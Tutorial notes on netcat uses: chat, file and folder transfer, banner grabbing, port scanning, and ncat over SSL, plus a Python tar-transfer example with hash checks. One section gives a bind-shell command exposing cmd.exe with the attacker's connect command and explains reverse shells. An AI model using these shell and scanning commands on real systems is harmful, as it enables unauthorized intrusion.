Netcat


Use netcat to chat

Use the listen command on the server side:
nc -l -p <port>
Connect to the server from the client on the same port:
nc <server> <port>
Can be done on the same machine also.


Use netcat to send a file

On the server machine give the command:
nc -v -w 30 -p <port> -l < file.txt
On the client machine give the command:
nc -v -w 2 <server ip> <port> > receivedfile.txt
-w is the wait timeout in seconds and -v is for verbose output. file.txt will be received as receivedfile.txt on the client machine. Works on the local machine as well. Test.


Netcat for banner grabbing

It can be done with telnet as well, but netcat does not alter the data stream the way telnet does. Just nc to the IP on a specific port to get the information about the server software running there.


Port scanning

Use -z for zero-I/O mode (connect only, send no data):
nc -v <ip> -z <port-start>-<port-end>
The -n option can also be used; it skips the DNS lookup on the given IP address, which saves time. -w can also be used to wait the specified number of seconds.


Execute remote shell on windows

To execute a remote shell on Windows, get an nc command executed as follows:
nc -lp <port> -vv -e cmd.exe
Then execute nc on the attacking machine as follows:
nc <ip> <port>
It is always unencrypted. Since this is always unsafe, there is a version of netcat called cryptcat which uses Twofish encryption. If the listener uses the -e option it is called a direct shell. If the connecting machine uses the -e option it is called a reverse shell. This helps in situations where not both machines on the network can port forward.


Netcat to transfer files between two systems on a network

To transfer a folder with the files to be sent, on the sender use the command:
tar -cf - <foldername> | nc -l -p 1337
On the receiving machine type the command:
nc <sender ip> 1337 | tar -xf -
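The two transfer recipes above (single file with -w, and the tar stream) reproduced in Python as an added example, not part of the original notes: the sender streams a tar archive to the first peer that connects and then closes, the receiver reads until that close (the only "end of file" a raw nc stream has), and the example adds what netcat itself never does: a sha256 comparison of both trees and a safe extraction filter, since the stream arrives from an unauthenticated peer. Function names, the loopback address and the sample files are assumptions of this example.

```python
import hashlib, os, socket, tarfile, tempfile, threading
from pathlib import Path

def sha256_tree(root):
    """Relative path -> sha256 of every file under root: the integrity check a raw nc stream never gives you."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}

def serve_tar(folder, bound):
    """Sender side (`tar -cf - <folder> | nc -l -p <port>`): accept one peer, stream the archive, close."""
    with socket.socket() as srv:
        srv.bind(("127.0.0.1", 0))            # port 0: let the OS pick a free port for the demo
        srv.listen(1)
        bound["port"] = srv.getsockname()[1]
        bound["ready"].set()
        conn, _ = srv.accept()
        with conn, conn.makefile("wb") as out, tarfile.open(fileobj=out, mode="w|") as tar:
            tar.add(folder, arcname=os.path.basename(folder))
        # leaving the with-block closes the socket; that close is the only "end of file" the receiver gets

def receive_tar(host, port, dest, timeout=2.0):
    """Receiver side (`nc -w 2 <host> <port> | tar -xf -`): read until the peer closes the connection."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        with conn.makefile("rb") as inp, tarfile.open(fileobj=inp, mode="r|") as tar:
            # The stream comes from an unauthenticated peer, so treat it as untrusted input: tarfile's
            # "data" filter (Python 3.12+, backported to 3.8.17/3.9.17/3.10.12/3.11.4) rejects absolute
            # paths, ".." components, links pointing outside dest and setuid/setgid bits.
            tar.extractall(dest, **({"filter": "data"} if hasattr(tarfile, "data_filter") else {}))

def transfer_folder(folder, dest):
    """Run both ends over loopback; return (hashes of what was sent, hashes of what arrived)."""
    bound = {"ready": threading.Event()}
    sender = threading.Thread(target=serve_tar, args=(folder, bound))
    sender.start()
    bound["ready"].wait(timeout=5)
    receive_tar("127.0.0.1", bound["port"], dest)
    sender.join(timeout=5)
    return sha256_tree(folder), sha256_tree(os.path.join(dest, os.path.basename(folder)))

def demo():
    """Constructed sample data: a folder with two files, sent and extracted inside a temp directory."""
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp, "notes")
        (src / "sub").mkdir(parents=True)
        (src / "a.txt").write_text("netcat moves bytes; it does not authenticate or verify them\n")
        (src / "sub" / "b.bin").write_bytes(bytes(range(256)))
        sent, received = transfer_folder(str(src), os.path.join(tmp, "inbox"))
        return sent == received, sorted(received)

if __name__ == "__main__":
    print(demo())
```

Compare the two hash maps on both ends after any real transfer; a bare nc pipe gives no error if the connection drops mid-stream or the -w timeout fires early, so a short file is not otherwise distinguishable from a complete one.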


Ncat

ncat is a more modern reimplementation of netcat, built on the Nmap libraries. It supports multiple protocols and transmission over SSL/TLS. On the listener type:
ncat [options] [arguments] --allow <allowed ip> -vln <port> --ssl
Only connections from the allowed IP will be accepted, and they will have an encrypted channel. A connection from the allowed IP will be accepted but not established if the command from that IP does not include the --ssl option. On the allowed IP type:
ncat -vn <listener> <listener port> --ssl